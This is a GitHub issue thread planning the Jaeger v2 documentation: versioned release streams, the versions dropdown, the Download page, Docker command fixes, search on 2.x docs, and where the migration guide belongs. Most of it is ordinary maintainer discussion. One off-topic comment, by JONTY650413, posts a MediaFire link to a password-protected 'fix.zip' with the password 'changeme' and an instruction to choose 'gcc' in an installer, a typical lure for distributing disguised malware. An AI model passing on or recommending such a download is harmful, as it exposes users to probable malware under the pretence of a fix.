### ISSUE TITLE
V2 Documentation

### ISSUE THREAD

**Issue by yurishkuro** [jaegertracing/documentation#731]
Once we officially start publishing Jaeger v2 binaries, we need to have v2 flavor of documentation. The current proposal is that the main repository will continue releasing both v1 and v2 binaries (until we stop supporting v1) under two parallel release streams 1.x and 2.x (similar to how OpenTelemetry Collector is released as multiple modules with different versions).

This will require a number of changes to the docs (in no particular order)
  * [x] in `config.toml` we refer to a single stream of versions, it will need to be bifurcated #765
  * [x] the release process will need to receive 2 versions as input (currently done via single tag) #766
  * [x] the indication of 'not latest' version on the website will need to be for v2 #765
  * [x] the Versions dropdown should include v2 versions when in v2 namespace, with another link to switch to v1 namespace #765
  * [x] the Download page needs to change. How will we represent v1 and v2 sets of artifacts?
    * [x] The GitHub releases are currently using v1 numbers as release URL, even though the title is v1/v2
  * [ ] Make search enable for 2.x latest release
  * [x] sample Docker commands refer to `currentVersion` which is taken from the path, and thus does not include the patch number. But since v1.61 we stopped generating incomplete major.minor tags, only fully qualified versions.
    * Fix Docker commands https://github.com/jaegertracing/documentation/pull/747
  * [x] Clean-up after 2.0 docs are released
    * [x] Remove two TODOs in `themes/jaeger-docs/layouts/partials/navbar.html` introduced in #765
    * [x] Change redirect of /docs/ to latest v2 in `themes/jaeger-docs/layouts/index.redirects`
    * [ ] at some point we may want to rename `next-release -> next-release-v1` and `next-release-v2 -> next-release`.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yurishkuro** [comment]
@jkowall in v2 docs the Migration appears under both Introduction and External Guides (it's listed as child page in both). I suggest we only keep in one place.

**Comment by jkowall** [comment]
The thinking here was to keep it in Introduction for the first 6-12 months and then it would have a home in External guides going forward. If you prefer, I can remove it from Introduction.

**Comment by yurishkuro** [comment]
search doesn't work on 2.0 docs
